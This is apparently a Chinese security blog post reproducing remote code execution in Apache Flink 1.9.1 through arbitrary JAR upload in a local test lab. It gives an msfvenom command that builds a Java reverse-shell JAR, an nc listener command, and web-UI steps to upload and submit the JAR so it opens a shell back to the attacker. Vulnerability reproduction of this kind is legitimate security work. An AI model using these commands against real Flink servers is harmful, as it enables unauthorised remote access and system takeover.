Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x00 漏洞概述

Flink核心是一个流式的数据流执行引擎,
其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。
基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。
可部署在各种集群环境,对各种大小的数据规模进行快速计算。

0x01影响版本

Apache Link < 1.9.1 (当前最新)

0x02 漏洞复现

环境搭建

测试环境:

  • win10
  • Flink 1.9.1
  • java8

首先下载Apache Flink 1.9.1Apache Flink 1.9.1

下载后解压,进入bin目录,运行start-cluster.bat批处理文件
然后访问127.0.0.1:8081即可

漏洞利用

生成payload

使用msfvenom生成payload,确保生成的LHOST地址靶机可以访问
生成的jar包名字随意

msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >test.jar

开始监听

使用nc监听端口

nc -lvvp 9999

上传payload

Submit New Job处点击+ Add New上传rec.jar文件

点击名称展开,然后点击Submit

反弹shell

参考文章

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现
Apache Flink远程代码执行预警


   转载规则


《Apache Flink 任意 Jar 包上传致 RCE 漏洞复现》 dylan 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
渗透实战之QQ空间钓鱼网站 渗透实战之QQ空间钓鱼网站
0x00 前言打开邮箱,发现垃圾箱里躺着一封垃圾邮件 一看就是钓鱼邮件,话不多说,搞他。 没什么技术含量,看看就好。 0x01 渗透过程第一部分直接打开链接 除了登陆可以点击,其他超链接都是假的,也太不敬业了。 然后发现地址栏域名和垃圾
2019-11-19
下一篇 
  目录